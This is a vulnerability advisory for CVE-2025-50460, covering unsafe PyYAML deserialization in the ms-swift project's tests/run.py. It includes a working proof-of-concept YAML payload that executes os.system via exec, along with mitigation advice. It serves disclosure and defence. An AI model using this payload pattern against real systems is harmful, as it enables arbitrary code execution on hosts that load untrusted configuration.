GHSA-fm6c-f59h-7mmg

Опубликовано: 31 июл. 2025

Источник: github

Github: Прошло ревью

CVSS4: 2.3

CVSS3: 9.8

Описание

MS SWIFT Remote Code Execution via unsafe PyYAML deserialization

Description

A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.

If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.

Affected Repository

Project: modelscope/ms-swift
Affect versions: latest
File: tests/run.py
GitHub Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
Dependency: PyYAML <= 5.3.1

Vulnerable Code

if args.run_config is not None and Path(args.run_config).exists(): with open(args.run_config, encoding='utf-8') as f: run_config = yaml.load(f, Loader=yaml.FullLoader)

Proof of Concept (PoC)

Step 1: Create malicious YAML file (`exploit.yaml`)

!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('mkdir HACKED')"

Step 2: Execute with vulnerable PyYAML (<= 5.3.1)

import yaml with open("exploit.yaml", "r") as f: cfg = yaml.load(f, Loader=yaml.FullLoader)

This results in execution of os.system, proving code execution.

Mitigation

Replace yaml.load() with yaml.safe_load()
Upgrade PyYAML to version 5.4 or later

Example Fix:

# Before yaml.load(f, Loader=yaml.FullLoader) # After yaml.safe_load(f)

Author

Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)
Contact: [anchor.rongyu020221@gmail.com]

Ссылки

Пакеты

Наименование

ms-swift

pip

Затронутые версииВерсия исправления

<= 3.6.3

Отсутствует

EPSS

Процентиль: 83%

0.02032

Низкий

2.3 Low

CVSS4

9.8 Critical

CVSS3

CVE ID

CVE-2025-50460

Дефекты

CWE-502

Связанные уязвимости

CVE-2025-50460

CVSS3: 9.8

nvd

6 месяцев назад

A remote code execution (RCE) vulnerability exists in the ms-swift project version 3.3.0 due to unsafe deserialization in tests/run.py using yaml.load() from the PyYAML library (versions = 5.3.1). If an attacker can control the content of the YAML configuration file passed to the --run_config parameter, arbitrary code can be executed during deserialization. This can lead to full system compromise. The vulnerability is triggered when a malicious YAML file is loaded, allowing the execution of arbitrary Python commands such as os.system(). It is recommended to upgrade PyYAML to version 5.4 or higher, and to use yaml.safe_load() to mitigate the issue.

EPSS

Процентиль: 83%

0.02032

Низкий

2.3 Low

CVSS4

9.8 Critical

CVSS3

CVE ID

CVE-2025-50460

Дефекты

CWE-502

GHSA-fm6c-f59h-7mmg

Описание

Description

Affected Repository

Vulnerable Code

Proof of Concept (PoC)

Step 1: Create malicious YAML file (exploit.yaml)

Step 2: Execute with vulnerable PyYAML (<= 5.3.1)

Mitigation

Example Fix:

Author

Ссылки

Пакеты

CVE ID

Дефекты

Связанные уязвимости

CVE ID

Дефекты

Step 1: Create malicious YAML file (`exploit.yaml`)